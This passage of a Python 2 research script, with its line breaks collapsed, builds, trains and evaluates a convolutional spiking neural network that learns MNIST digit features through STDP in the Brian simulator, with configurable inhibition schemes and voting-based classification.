Based on the results from the previous 'update_interval', assign labels to the excitatory neurons. ''' for j in xrange(10): num_assignments = len(np.where(input_numbers == j)[0]) if num_assignments > 0: accumulated_inputs[j] += num_assignments accumulated_rates[:, j] = accumulated_rates[:, j] * 0.9 + \ np.ravel(np.sum(result_monitor[input_numbers == j], axis=0) / num_assignments) assignments = np.argmax(accumulated_rates, axis=1).reshape((conv_features, n_e)) spike_proportions = np.divide(accumulated_rates, np.sum(accumulated_rates, axis=0)) return assignments, accumulated_rates, spike_proportions def build_network(): global fig_num, assignments neuron_groups['e'] = b.NeuronGroup(n_e_total, neuron_eqs_e, threshold=v_thresh_e, refractory=refrac_e, reset=scr_e, compile=True, freeze=True) neuron_groups['i'] = b.NeuronGroup(n_e_total, neuron_eqs_i, threshold=v_thresh_i, refractory=refrac_i, reset=v_reset_i, compile=True, freeze=True) for name in population_names: print '...Creating neuron group:', name # get a subgroup of size 'n_e' from all exc neuron_groups[name + 'e'] = neuron_groups['e'].subgroup(conv_features * n_e) # get a subgroup of size 'n_i' from the inhibitory layer neuron_groups[name + 'i'] = neuron_groups['i'].subgroup(conv_features * n_e) # start the membrane potentials of these groups 40mV below their resting potentials neuron_groups[name + 'e'].v = v_rest_e - 40. * b.mV neuron_groups[name + 'i'].v = v_rest_i - 40. * b.mV print '...Creating recurrent connections' for name in population_names: # if we're in test mode / using some stored weights if test_mode: # load up adaptive threshold parameters if save_best_model: neuron_groups['e'].theta = np.load(os.path.join(best_weights_dir, '_'.join(['theta_A', ending +'_best.npy']))) else: neuron_groups['e'].theta = np.load(os.path.join(end_weights_dir, '_'.join(['theta_A', ending +'_end.npy']))) else: # otherwise, set the adaptive additive threshold parameter at 20mV neuron_groups['e'].theta = np.ones((n_e_total)) * 20.0 * b.mV for conn_type in recurrent_conn_names: if conn_type == 'ei': # create connection name (composed of population and connection types) conn_name = name + conn_type[0] + name + conn_type[1] # create a connection from the first group in conn_name with the second group connections[conn_name] = b.Connection(neuron_groups[conn_name[0:2]], neuron_groups[conn_name[2:4]], structure='sparse', state='g' + conn_type[0]) # instantiate the created connection for feature in xrange(conv_features): for n in xrange(n_e): connections[conn_name][feature * n_e + n, feature * n_e + n] = 10.4 elif conn_type == 'ie' and not (test_no_inhibition and test_mode): # create connection name (composed of population and connection types) conn_name = name + conn_type[0] + name + conn_type[1] # get weight matrix depending on training or test phase if test_mode: if save_best_model and not test_max_inhibition: weight_matrix = np.load(os.path.join(best_weights_dir, '_'.join([conn_name, ending + '_best.npy']))) elif test_max_inhibition: weight_matrix = max_inhib * np.ones((n_e_total, n_e_total)) else: weight_matrix = np.load(os.path.join(end_weights_dir, '_'.join([conn_name, ending + '_end.npy']))) # create a connection from the first group in conn_name with the second group connections[conn_name] = b.Connection(neuron_groups[conn_name[0:2]], neuron_groups[conn_name[2:4]], structure='sparse', state='g' + conn_type[0]) # define the actual synaptic connections and strengths for feature in xrange(conv_features): for other_feature in xrange(conv_features): if feature != other_feature: if n_e == 1: x, y = feature // np.sqrt(n_e_total), feature % np.sqrt(n_e_total) x_, y_ = other_feature // np.sqrt(n_e_total), other_feature % np.sqrt(n_e_total) else: x, y = feature // np.sqrt(conv_features), feature % np.sqrt(conv_features) x_, y_ = other_feature // np.sqrt(conv_features), other_feature % np.sqrt(conv_features) for n in xrange(n_e): if test_mode: connections[conn_name][feature * n_e + n, other_feature * n_e + n] = \ weight_matrix[feature * n_e + n, other_feature * n_e + n] else: if inhib_scheme == 'increasing': connections[conn_name][feature * n_e + n, other_feature * n_e + n] = \ min(max_inhib, start_inhib * \ np.sqrt(euclidean([x, y], [x_, y_]))) elif inhib_scheme == 'eth': connections[conn_name][feature * n_e + n, \ other_feature * n_e + n] = max_inhib elif inhib_scheme == 'mhat': connections[conn_name][feature * n_e + n, \ other_feature * n_e + n] = \ min(max_inhib, start_inhib * \ mhat(np.sqrt(euclidean([x, y], [x_, y_])), \ sigma=1.0, scale=1.0, shift=0.0)) print '...Creating monitors for:', name # spike rate monitors for excitatory and inhibitory neuron populations rate_monitors[name + 'e'] = b.PopulationRateMonitor(neuron_groups[name + 'e'], bin=(single_example_time + resting_time) / b.second) rate_monitors[name + 'i'] = b.PopulationRateMonitor(neuron_groups[name + 'i'], bin=(single_example_time + resting_time) / b.second) spike_counters[name + 'e'] = b.SpikeCounter(neuron_groups[name + 'e']) # record neuron population spikes if specified if record_spikes and do_plot: spike_monitors[name + 'e'] = b.SpikeMonitor(neuron_groups[name + 'e']) spike_monitors[name + 'i'] = b.SpikeMonitor(neuron_groups[name + 'i']) if record_spikes and do_plot: b.figure(fig_num, figsize=(8, 6)) fig_num += 1 b.ion() b.subplot(211) b.raster_plot(spike_monitors['Ae'], refresh=1000 * b.ms, showlast=1000 * b.ms, title='Excitatory spikes per neuron') b.subplot(212) b.raster_plot(spike_monitors['Ai'], refresh=1000 * b.ms, showlast=1000 * b.ms, title='Inhibitory spikes per neuron') b.tight_layout() # creating Poission spike train from input image (784 vector, 28x28 image) for name in input_population_names: input_groups[name + 'e'] = b.PoissonGroup(n_input, 0) rate_monitors[name + 'e'] = b.PopulationRateMonitor(input_groups[name + 'e'], bin=(single_example_time + resting_time) / b.second) # creating connections from input Poisson spike train to excitatory neuron population(s) for name in input_connection_names: print '\n...Creating connections between', name[0], 'and', name[1] # for each of the input connection types (in this case, excitatory -> excitatory) for conn_type in input_conn_names: # saved connection name conn_name = name[0] + conn_type[0] + name[1] + conn_type[1] # get weight matrix depending on training or test phase if test_mode: if save_best_model: weight_matrix = np.load(os.path.join(best_weights_dir, '_'.join([conn_name, ending + '_best.npy']))) else: weight_matrix = np.load(os.path.join(end_weights_dir, '_'.join([conn_name, ending + '_end.npy']))) # create connections from the windows of the input group to the neuron population input_connections[conn_name] = b.Connection(input_groups['Xe'], neuron_groups[name[1] + conn_type[1]], \ structure='sparse', state='g' + conn_type[0], delay=True, max_delay=delay[conn_type][1]) if test_mode: for feature in xrange(conv_features): for n in xrange(n_e): for idx in xrange(conv_size ** 2): input_connections[conn_name][convolution_locations[n][idx], feature * n_e + n] = \ weight_matrix[convolution_locations[n][idx], feature * n_e + n] else: for feature in xrange(conv_features): for n in xrange(n_e): for idx in xrange(conv_size ** 2): input_connections[conn_name][convolution_locations[n][idx], feature * n_e + n] = (b.random() + 0.01) * 0.3 if test_mode: if do_plot: plot_weights_and_assignments(assignments) fig_num += 1 # if excitatory -> excitatory STDP is specified, add it here (input to excitatory populations) if not test_mode: print '...Creating STDP for connection', name # STDP connection name conn_name = name[0] + conn_type[0] + name[1] + conn_type[1] # create the STDP object stdp_methods[conn_name] = b.STDP(input_connections[conn_name], eqs=eqs_stdp_ee, \ pre=eqs_stdp_pre_ee, post=eqs_stdp_post_ee, wmin=0., wmax=wmax_ee) print '\n' def run_train(): global fig_num, input_intensity, previous_spike_count, rates, assignments, clusters, cluster_assignments, \ simple_clusters, simple_cluster_assignments, index_matrix, accumulated_rates, \ accumulated_inputs, spike_proportions if do_plot: input_image_monitor, input_image = plot_input(rates) fig_num += 1 weights_assignments_figure, weights_axes, assignments_axes, weights_image, \ assignments_image = plot_weights_and_assignments(assignments) fig_num += 1 # set up performance recording and plotting num_evaluations = int(num_examples / update_interval) + 1 performances = { voting_scheme : np.zeros(num_evaluations) for voting_scheme in voting_schemes } num_weight_updates = int(num_examples / weight_update_interval) all_deltas = np.zeros((num_weight_updates, n_e_total)) deltas = np.zeros(num_weight_updates) if do_plot: performance_monitor, fig_num, fig_performance = plot_performance(fig_num, performances, num_evaluations) line, fig_num, deltas_figure = plot_deltas(fig_num, deltas, num_weight_updates) if plot_all_deltas: lines, fig_num, all_deltas_figure = plot_all_deltas(fig_num, all_deltas, num_weight_updates) else: performances, wrong_idxs, wrong_labels = get_current_performance(performances, 0) # initialize network j = 0 num_retries = 0 b.run(0) if save_best_model: best_performance = 0.0 # start recording time start_time = timeit.default_timer() last_weights = input_connections['XeAe'][:].todense() current_inhib = start_inhib while j < num_examples: # get the firing rates of the next input example rates = (data['x'][j % data_size, :, :] / 8.0) * input_intensity * \ ((noise_const * np.random.randn(n_input_sqrt, n_input_sqrt)) + 1.0) # sets the input firing rates input_groups['Xe'].rate = rates.reshape(n_input) # plot the input at this step if do_plot: input_image_monitor = update_input(rates, input_image_monitor, input_image) # run the network for a single example time b.run(single_example_time) # add Gaussian noise to weights after each iteration if weights_noise: input_connections['XeAe'].W.alldata[:] *= 1 + (np.random.randn(n_input * conv_features) * weights_noise_constant) # get new neuron label assignments every 'update_interval' if j % update_interval == 0 and j > 0: assignments, accumulated_rates, spike_proportions = assign_labels(result_monitor, input_numbers[j - update_interval : j], accumulated_rates, accumulated_inputs) # get count of spikes over the past iteration current_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) - previous_spike_count previous_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) # make sure synapse weights don't grow too large normalize_weights() if not j % weight_update_interval == 0 and save_weights: save_connections(weights_dir, connections, input_connections, ending, j) save_theta(weights_dir, population_names, neuron_groups, ending, j) np.save(os.path.join(assignments_dir, '_'.join(['assignments', ending, str(j)])), assignments) np.save(os.path.join(misc_dir, '_'.join(['accumulated_rates', ending, str(j)])), accumulated_rates) np.save(os.path.join(misc_dir, '_'.join(['spike_proportions', ending, str(j)])), spike_proportions) if j % weight_update_interval == 0: deltas[j / weight_update_interval] = np.sum(np.abs((input_connections['XeAe'][:].todense() - last_weights))) if plot_all_deltas: all_deltas[j / weight_update_interval, :] = np.ravel(input_connections['XeAe'][:].todense() - last_weights) last_weights = input_connections['XeAe'][:].todense() # pickling performance recording and iteration number p.dump((j, deltas), open(os.path.join(deltas_dir, ending + '.p'), 'wb')) # update weights every 'weight_update_interval' if j % weight_update_interval == 0 and do_plot: update_weights_and_assignments(weights_assignments_figure, weights_axes, assignments_axes, \ weights_image, assignments_image, assignments, current_spike_count) # if the neurons in the network didn't spike more than four times if np.sum(current_spike_count) < 5 and num_retries < 3: # increase the intensity of input input_intensity += 2 num_retries += 1 # set all network firing rates to zero for name in input_population_names: input_groups[name + 'e'].rate = 0 # let the network relax back to equilibrium if not reset_state_vars: b.run(resting_time) else: for neuron_group in neuron_groups: neuron_groups[neuron_group].v = v_reset_e neuron_groups[neuron_group].ge = 0 neuron_groups[neuron_group].gi = 0 # otherwise, record results and continue simulation else: num_retries = 0 if j == increase_iter: for feature in xrange(conv_features): for other_feature in xrange(conv_features): if feature != other_feature: for n in xrange(n_e): connections['AiAe'][feature * n_e + n, \ other_feature * n_e + n] = max_inhib # record the current number of spikes result_monitor[j % update_interval, :] = current_spike_count # get true label of last input example input_numbers[j] = data['y'][j % data_size][0] activity = result_monitor[j % update_interval, :] / np.sum(result_monitor[j % update_interval, :]) if do_plot and save_spikes: fig = plt.figure(9, figsize = (8, 8)) plt.imshow(rates.reshape((28, 28)), interpolation='nearest', vmin=0, vmax=64, cmap='binary') plt.title(str(data['y'][j % data_size][0]) + ' : ' + ', '.join( \ [str(int(output_numbers[scheme][j, 0])) for scheme in voting_schemes])) fig = plt.figure(10, figsize = (7, 7)) plt.xticks(xrange(features_sqrt)) plt.yticks(xrange(features_sqrt)) plt.title('Activity heatmap (total spikes = ' + str(np.sum(result_monitor[j % update_interval, :])) + ')') plt.imshow(activity.reshape((features_sqrt, features_sqrt)).T, interpolation='nearest', cmap='binary') plt.grid(True) fig.canvas.draw() if save_spikes: np.save(os.path.join(spikes_dir, '_'.join([ending, 'spike_counts', str(j)])), current_spike_count) np.save(os.path.join(spikes_dir, '_'.join([ending, 'rates', str(j)])), rates) # get network filter weights filters = input_connections['XeAe'][:].todense() # get the output classifications of the network for scheme, outputs in predict_label(assignments, result_monitor[j % update_interval, :], \ accumulated_rates, spike_proportions).items(): if scheme != 'distance': output_numbers[scheme][j, :] = outputs elif scheme == 'distance': current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel() output_numbers[scheme][j, 0] = assignments[np.argmin([ euclidean(current_input, \ filters[:, i]) for i in xrange(conv_features) ])] # print progress if j % print_progress_interval == 0 and j > 0: print 'runs done:', j, 'of', int(num_examples), '(time taken for past', print_progress_interval, 'runs:', str(timeit.default_timer() - start_time) + ')' start_time = timeit.default_timer() if j % weight_update_interval == 0 and do_plot: update_deltas_plot(line, deltas, j, deltas_figure) if plot_all_deltas: update_all_deltas_plot(lines, all_deltas, j, all_deltas_figure) # plot performance if appropriate if (j % update_interval == 0 or j == num_examples - 1) and j > 0: if do_plot: # updating the performance plot perf_plot, performances, wrong_idxs, wrong_labels = update_performance_plot(performance_monitor, performances, j, fig_performance) else: performances, wrong_idxs, wrong_labels = get_current_performance(performances, j) # pickling performance recording and iteration number p.dump((j, performances), open(os.path.join(performance_dir, ending + '.p'), 'wb')) # Save the best model's weights and theta parameters (if so specified) if save_best_model: for performance in performances: if performances[performance][int(j / float(update_interval))] > best_performance: print '\n', 'Best model thus far! Voting scheme:', performance, '\n' best_performance = performances[performance][int(j / float(update_interval))] save_connections(best_weights_dir, connections, input_connections, ending, 'best') save_theta(best_weights_dir, population_names, neuron_groups, ending, 'best') np.save(os.path.join(best_assignments_dir, '_'.join(['assignments', ending, 'best'])), assignments) np.save(os.path.join(best_misc_dir, '_'.join(['accumulated_rates', ending, 'best'])), accumulated_rates) np.save(os.path.join(best_misc_dir, '_'.join(['spike_proportions', ending, 'best'])), spike_proportions) # Print out performance progress intermittently for performance in performances: print '\nClassification performance (' + performance + ')', performances[performance][1:int(j / float(update_interval)) + 1], \ '\nAverage performance:', sum(performances[performance][1:int(j / float(update_interval)) + 1]) / \ float(len(performances[performance][1:int(j / float(update_interval)) + 1])), \ '\nBest performance:', max(performances[performance][1:int(j / float(update_interval)) + 1]), '\n' # set input firing rates back to zero for name in input_population_names: input_groups[name + 'e'].rate = 0 # run the network for 'resting_time' to relax back to rest potentials if not reset_state_vars: b.run(resting_time) else: for neuron_group in neuron_groups: neuron_groups[neuron_group].v = v_reset_e neuron_groups[neuron_group].ge = 0 neuron_groups[neuron_group].gi = 0 # bookkeeping input_intensity = start_input_intensity j += 1 # ensure weights don't grow without bound normalize_weights() print '\n' def run_test(): global fig_num, input_intensity, previous_spike_count, rates, assignments, clusters, cluster_assignments, \ simple_clusters, simple_cluster_assignments, index_matrix, accumulated_rates, \ accumulated_inputs, spike_proportions # set up performance recording and plotting num_evaluations = int(num_examples / update_interval) + 1 performances = { voting_scheme : np.zeros(num_evaluations) for voting_scheme in voting_schemes } num_weight_updates = int(num_examples / weight_update_interval) all_deltas = np.zeros((num_weight_updates, (conv_size ** 2) * n_e_total)) deltas = np.zeros(num_weight_updates) # initialize network j = 0 num_retries = 0 b.run(0) # get network filter weights filters = input_connections['XeAe'][:].todense() # start recording time start_time = timeit.default_timer() while j < num_examples: # get the firing rates of the next input example rates = (data['x'][j % data_size, :, :] / 8.0) * input_intensity # sets the input firing rates input_groups['Xe'].rate = rates.reshape(n_input) # run the network for a single example time b.run(single_example_time) # get count of spikes over the past iteration current_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) - previous_spike_count previous_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) # if the neurons in the network didn't spike more than four times if np.sum(current_spike_count) < 5 and num_retries < 3: # increase the intensity of input input_intensity += 2 num_retries += 1 # set all network firing rates to zero for name in input_population_names: input_groups[name + 'e'].rate = 0 # let the network relax back to equilibrium if not reset_state_vars: b.run(resting_time) else: for neuron_group in neuron_groups: neuron_groups[neuron_group].v = v_reset_e neuron_groups[neuron_group].ge = 0 neuron_groups[neuron_group].gi = 0 # otherwise, record results and continue simulation else: num_retries = 0 # record the current number of spikes result_monitor[j % update_interval, :] = current_spike_count # get true label of the past input example input_numbers[j] = data['y'][j % data_size][0] # get the output classifications of the network for scheme, outputs in predict_label(assignments, result_monitor[j % update_interval, :], accumulated_rates, spike_proportions).items(): if scheme != 'distance': output_numbers[scheme][j, :] = outputs elif scheme == 'distance': current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel() output_numbers[scheme][j, 0] = assignments[np.argmin([ euclidean(current_input, \ filters[:, i]) for i in xrange(conv_features) ])] # print progress if j % print_progress_interval == 0 and j > 0: print 'runs done:', j, 'of', int(num_examples), '(time taken for past', print_progress_interval, 'runs:', str(timeit.default_timer() - start_time) + ')' start_time = timeit.default_timer() # set input firing rates back to zero for name in input_population_names: input_groups[name + 'e'].rate = 0 # run the network for 'resting_time' to relax back to rest potentials if not reset_state_vars: b.run(resting_time) else: for neuron_group in neuron_groups: neuron_groups[neuron_group].v = v_reset_e neuron_groups[neuron_group].ge = 0 neuron_groups[neuron_group].gi = 0 # bookkeeping input_intensity = start_input_intensity j += 1 print '\n' def save_results(): ''' Save results of simulation (train or test) ''' print '...Saving results' if not test_mode: save_connections(end_weights_dir, connections, input_connections, ending, 'end') save_theta(end_weights_dir, population_names, neuron_groups, ending, 'end') np.save(os.path.join(end_assignments_dir, '_'.join(['assignments', ending, 'end'])), assignments) np.save(os.path.join(end_misc_dir, '_'.join(['accumulated_rates', ending, 'end'])), accumulated_rates) np.save(os.path.join(end_misc_dir, '_'.join(['spike_proportions', ending, 'end'])), spike_proportions) else: np.save(os.path.join(activity_dir, '_'.join(['results', str(num_examples), ending])), result_monitor) np.save(os.path.join(activity_dir, '_'.join(['input_numbers', str(num_examples), ending])), input_numbers) print '\n' def evaluate_results(): ''' Evalute the network using the various voting schemes in test mode ''' global update_interval test_results = {} for scheme in voting_schemes: test_results[scheme] = np.zeros((10, num_examples)) print '\n...Calculating accuracy per voting scheme' # get network filter weights filters = input_connections['XeAe'][:].todense() # for idx in xrange(end_time_testing - end_time_training): for idx in xrange(num_examples): label_rankings = predict_label(assignments, result_monitor[idx, :], accumulated_rates, spike_proportions) for scheme in voting_schemes: if scheme != 'distance': test_results[scheme][:, idx] = label_rankings[scheme] elif scheme == 'distance': rates = (data['x'][idx % data_size, :, :] / 8.0) * input_intensity current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel() results = np.zeros(10) results[0] = assignments[np.argmin([ euclidean(current_input, \ filters[:, i]) for i in xrange(conv_features) ])] test_results[scheme][:, idx] = results print test_results differences = { scheme : test_results[scheme][0, :] - input_numbers for scheme in voting_schemes } correct = { scheme : len(np.where(differences[scheme] == 0)[0]) for scheme in voting_schemes } incorrect = { scheme : len(np.where(differences[scheme] != 0)[0]) for scheme in voting_schemes } accuracies = { scheme : correct[scheme] / float(num_examples) * 100 for scheme in voting_schemes } conf_matrices = np.array([confusion_matrix(test_results[scheme][0, :], \ input_numbers) for scheme in voting_schemes]) np.save(os.path.join(results_path, '_'.join(['confusion_matrix', ending]) + '.npy'), conf_matrices) print '\nConfusion matrix:\n\n', conf_matrices for scheme in voting_schemes: print '\n-', scheme, 'accuracy:', accuracies[scheme] results = pd.DataFrame([ [ ending ] + accuracies.values() ], columns=[ 'Model' ] + accuracies.keys()) filename = '_'.join([str(conv_features), 'results.csv']) if not filename in os.listdir(results_path): results.to_csv(os.path.join(results_path, filename), index=False) else: all_results = pd.read_csv(os.path.join(results_path, filename)) all_results = pd.concat([all_results, results], ignore_index=True) all_results.to_csv(os.path.join(results_path, filename), index=False) print '\n' if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--mode', default='train', help='Network operating mode: \ "train" mode learns the synaptic weights of the network, and \ "test" mode holds the weights fixed / evaluates accuracy on test data.') parser.add_argument('--conv_size', type=int, default=28, help='Side length of the square convolution \ window used by the input -> excitatory layer of the network.') parser.add_argument('--conv_stride', type=int, default=0, help='Horizontal, vertical stride \ of the convolution window used by input layer of the network.') parser.add_argument('--conv_features', type=int, default=100, help='Number of excitatory \ convolutional features / filters / patches used in the network.') parser.add_argument('--do_plot', type=str, default='False', help='Whether or not to display plots during network \ training / testing. Defaults to False, as this makes the \ network operation speedier, and possible to run on HPC resources.') parser.add_argument('--num_train', type=int, default=10000, help='The number of \ examples for which to train the network on.') parser.add_argument('--num_test', type=int, default=10000, help='The number of \ examples for which to test the network on.') parser.add_argument('--random_seed', type=int, default=0, help='The random seed \ (any integer) from which to generate random numbers.') parser.add_argument('--save_weights', type=str, default='False', help='Whether or not to \ save the weights of the model every `weight_update_interval`.') parser.add_argument('--weight_update_interval', type=int, default=10, help='How often \ to update the plot of network filter weights.') parser.add_argument('--save_best_model', type=str, default='True', help='Whether \ to save the current best version of the model.') parser.add_argument('--update_interval', type=int, default=250, help='How often \ to update neuron labels and classify new inputs.') parser.add_argument('--plot_all_deltas', type=str, default='False', help='Whether or not to \ plot weight changes for all neurons from input to excitatory layer.') parser.add_argument('--train_remove_inhibition', type=str, default='False', help='Whether or not to \ remove lateral inhibition during the training phase.') parser.add_argument('--test_no_inhibition', type=str, default='False', help='Whether or not to \ remove lateral inhibition during the test phase.') parser.add_argument('--test_max_inhibition', type=str, default='False', help='Whether or not to \ use ETH-style inhibition during the test phase.') parser.add_argument('--start_inhib', type=float, default=0.1, help='The beginning value \ of inhibiton for the increasing scheme.') parser.add_argument('--max_inhib', type=float, default=17.4, help='The maximum synapse \ weight for inhibitory to excitatory connections.') parser.add_argument('--reset_state_vars', type=str, default='False', help='Whether to \ reset neuron / synapse state variables or run a "reset" period.') parser.add_argument('--inhib_update_interval', type=int, default=250, \ help='How often to increase the inhibition strength.') parser.add_argument('--inhib_schedule', type=str, default='linear', help='How to \ update the strength of inhibition as the training progresses.') parser.add_argument('--save_spikes', type=str, default='False', help='Whether or not to \ save 2D graphs of spikes to later use to make an activity time-lapse.') parser.add_argument('--normalize_inputs', type=str, default='False', help='Whether or not \ to ensure all inputs contain the same amount of "ink".') parser.add_argument('--proportion_low', type=float, default=0.5, help='What proportion of \ the training to grow the inhibition from "start_inhib" to "max_inhib".') parser.add_argument('--noise_const', type=float, default=0.0, help='The scale of the \ noise added to input examples.') parser.add_argument('--inhib_scheme', type=str, default='increasing', help='How inhibition from \ inhibitory to excitatory neurons is handled.') parser.add_argument('--weights_noise', type=str, default='False', help='Whether to use multiplicative \ Gaussian noise on synapse weights on each iteration.') parser.add_argument('--weights_noise_constant', type=float, default=1e-2, help='The spread of the \ Gaussian noise used on synapse weights ') parser.add_argument('--start_input_intensity', type=float, default=2.0, help='The intensity at which the \ input is (default) presented to the network.') parser.add_argument('--test_adaptive_threshold', type=str, default='False', help='Whether or not to allow \ neuron thresholds to adapt during the test phase.') parser.add_argument('--train_time', type=float, default=0.35, help='How long training \ inputs are presented to the network.') parser.add_argument('--train_rest', type=float, default=0.15, help='How long the network is allowed \ to settle back to equilibrium between training examples.') parser.add_argument('--test_time', type=float, default=0.35, help='How long test \ inputs are presented to the network.') parser.add_argument('--test_rest', type=float, default=0.15, help='How long the network is allowed \ to settle back to equilibrium between test examples.') parser.add_argument('--dt', type=float, default=0.25, help='Integration time step in milliseconds.') # parse arguments and place them in local scope args = parser.parse_args() args = vars(args) locals().update(args) print '\nOptional argument values:' for key, value in args.items(): print '-', key, ':', value print '\n' for var in [ 'do_plot', 'plot_all_deltas', 'reset_state_vars', 'test_max_inhibition', \ 'normalize_inputs', 'save_weights', 'save_best_model', 'test_no_inhibition', \ 'save_spikes', 'weights_noise', 'test_adaptive_threshold' ]: if locals()[var] == 'True': locals()[var] = True elif locals()[var] == 'False': locals()[var] = False else: raise Exception('Expecting True or False-valued command line argument "' + var + '".') # test or training mode test_mode = mode == 'test' if test_mode: num_examples = num_test else: num_examples = num_train if test_mode: data_size = 10000 else: data_size = 60000 # At which iteration do we increase the inhibition to the ETH level? increase_iter = int(num_train * proportion_low) # set brian global preferences b.set_global_preferences(defaultclock = b.Clock(dt=dt*b.ms), useweave = True, gcc_options = ['-ffast-math -march=native'], usecodegen = True, usecodegenweave = True, usecodegenstateupdate = True, usecodegenthreshold = False, usenewpropagate = True, usecstdp = True, openmp = False, magic_useframes = False, useweave_linear_diffeq = True) # for reproducibility's sake np.random.seed(random_seed) start = timeit.default_timer() data = get_labeled_data(os.path.join(MNIST_data_path, 'testing' if test_mode else 'training'), not test_mode, False, xrange(10), 1000, normalize_inputs) print 'Time needed to load data:', timeit.default_timer() - start # set parameters for simulation based on train / test mode record_spikes = True # number of inputs to the network n_input = 784 n_input_sqrt = int(math.sqrt(n_input)) # number of neurons parameters if conv_size == 28 and conv_stride == 0: n_e = 1 else: n_e = ((n_input_sqrt - conv_size) / conv_stride + 1) ** 2 n_e_total = n_e * conv_features n_e_sqrt = int(math.sqrt(n_e)) n_i = n_e features_sqrt = int(math.ceil(math.sqrt(conv_features))) # time (in seconds) per data example presentation and rest period in between if not test_mode: single_example_time = train_time * b.second resting_time = train_rest * b.second else: single_example_time = test_time * b.second resting_time = test_rest * b.second # set the update interval if test_mode: update_interval = num_examples # weight updates and progress printing intervals print_progress_interval = 10 # rest potential parameters, reset potential parameters, threshold potential parameters, and refractory periods v_rest_e, v_rest_i = -65. * b.mV, -60. * b.mV v_reset_e, v_reset_i = -65. * b.mV, -45. * b.mV v_thresh_e, v_thresh_i = -52. * b.mV, -40. * b.mV refrac_e, refrac_i = 5. * b.ms, 2. * b.ms # dictionaries for weights and delays weight, delay = {}, {} # populations, connections, saved connections, etc. input_population_names = [ 'X' ] population_names = [ 'A' ] input_connection_names = [ 'XA' ] save_conns = [ 'XeAe', 'AeAe' ] # weird and bad names for variables, I think input_conn_names = [ 'ee_input' ] recurrent_conn_names = [ 'ei', 'ie', 'ee' ] # setting weight, delay, and intensity parameters weight['ee_input'] = (conv_size ** 2) * 0.099489796 delay['ee_input'] = (0 * b.ms, 10 * b.ms) delay['ei_input'] = (0 * b.ms, 5 * b.ms) input_intensity = start_input_intensity current_inhibition = 1.0 # time constants, learning rates, max weights, weight dependence, etc. tc_pre_ee, tc_post_ee = 20 * b.ms, 20 * b.ms nu_ee_pre, nu_ee_post = 0.0001, 0.01 nu_AeAe_pre, nu_Ae_Ae_post = 0.1, 0.5 wmax_ee = 1.0 exp_ee_post = exp_ee_pre = 0.2 w_mu_pre, w_mu_post = 0.2, 0.2 # setting up differential equations (depending on train / test mode) if test_mode and not test_adaptive_threshold: scr_e = 'v = v_reset_e; timer = 0*ms' else: tc_theta = 1e7 * b.ms theta_plus_e = 0.05 * b.mV scr_e = 'v = v_reset_e; theta += theta_plus_e; timer = 0*ms' offset = 20.0 * b.mV v_thresh_e = '(v>(theta - offset + ' + str(v_thresh_e) + ')) * (timer>refrac_e)' # equations for neurons neuron_eqs_e = ''' dv/dt = ((v_rest_e - v) + (I_synE + I_synI) / nS) / (100 * ms) : volt I_synE = ge * nS * -v : amp I_synI = gi * nS * (-100.*mV-v) : amp dge/dt = -ge/(1.0*ms) : 1 dgi/dt = -gi/(2.0*ms) : 1 ''' if test_mode: neuron_eqs_e += '\n theta :volt' else: neuron_eqs_e += '\n dtheta/dt = -theta / (tc_theta) : volt' neuron_eqs_e += '\n dtimer/dt = 100.0 : ms' neuron_eqs_i = ''' dv/dt = ((v_rest_i - v) + (I_synE + I_synI) / nS) / (10*ms) : volt I_synE = ge * nS * -v : amp I_synI = gi * nS * (-85.*mV-v) : amp dge/dt = -ge/(1.0*ms) : 1 dgi/dt = -gi/(2.0*ms) : 1 ''' # STDP synaptic traces eqs_stdp_ee = ''' dpre/dt = -pre / tc_pre_ee : 1.0 dpost/dt = -post / tc_post_ee : 1.0 ''' eqs_stdp_AeAe = ''' dpre/dt = -pre / tc_pre_ee : 1.0 dpost/dt = -post / tc_post_ee : 1.0 ''' # STDP rule (post-pre, no weight dependence) eqs_stdp_pre_ee = 'pre = 1.; w -= nu_ee_pre * post' eqs_stdp_post_ee = 'w += nu_ee_post * pre; post = 1.' eqs_stdp_pre_AeAe = 'pre += 1.; w -= nu_AeAe_pre * post' eqs_stdp_post_AeAe = 'w += nu_AeAe_post * pre; post += 1.' print '\n' # set ending of filename saves ending = '_'.join([ str(conv_size), str(conv_stride), str(conv_features), str(n_e), \ str(num_train), str(random_seed), str(proportion_low), \ str(start_inhib), str(max_inhib) ]) b.ion() fig_num = 1 # creating dictionaries for various objects neuron_groups, input_groups, connections, input_connections, stdp_methods, \ rate_monitors, spike_monitors, spike_counters, output_numbers = {}, {}, {}, {}, {}, {}, {}, {}, {} # creating convolution locations inside the input image convolution_locations = {} for n in xrange(n_e): convolution_locations[n] = [ ((n % n_e_sqrt) * conv_stride + (n // n_e_sqrt) * n_input_sqrt * \ conv_stride) + (x * n_input_sqrt) + y for y in xrange(conv_size) for x in xrange(conv_size) ] # instantiating neuron "vote" monitor result_monitor = np.zeros((update_interval, conv_features, n_e)) # bookkeeping variables previous_spike_count = np.zeros((conv_features, n_e)) input_numbers = np.zeros(num_examples) rates = np.zeros((n_input_sqrt, n_input_sqrt)) if test_mode: assignments = np.load(os.path.join(best_assignments_dir, '_'.join(['assignments', ending, 'best.npy']))) accumulated_rates = np.load(os.path.join(best_misc_dir, '_'.join(['accumulated_rates', ending, 'best.npy']))) spike_proportions = np.load(os.path.join(best_misc_dir, '_'.join(['spike_proportions', ending, 'best.npy']))) else: assignments = -1 * np.ones((conv_features, n_e)) # build the spiking neural network build_network() if test_mode: voting_schemes = ['all', 'all_active', 'most_spiked_patch', 'most_spiked_location', 'confidence_weighting', \ 'activity_neighborhood', 'most_spiked_neighborhood', 'distance'] else: voting_schemes = ['all', 'all_active', 'most_spiked_patch', 'most_spiked_location', \ 'confidence_weighting', 'activity_neighborhood', 'most_spiked_neighborhood'] for scheme in voting_schemes: output_numbers[scheme] = np.zeros((num_examples, 10)) if not test_mode: accumulated_rates = np.zeros((conv_features * n_e, 10)) accumulated_inputs = np.zeros(10) spike_proportions = np.zeros((conv_features * n_e, 10)) # run the simulation of the network if test_mode: run_test() else: run_train() # save and plot results save_results() # evaluate results if test_mode: evaluate_results()
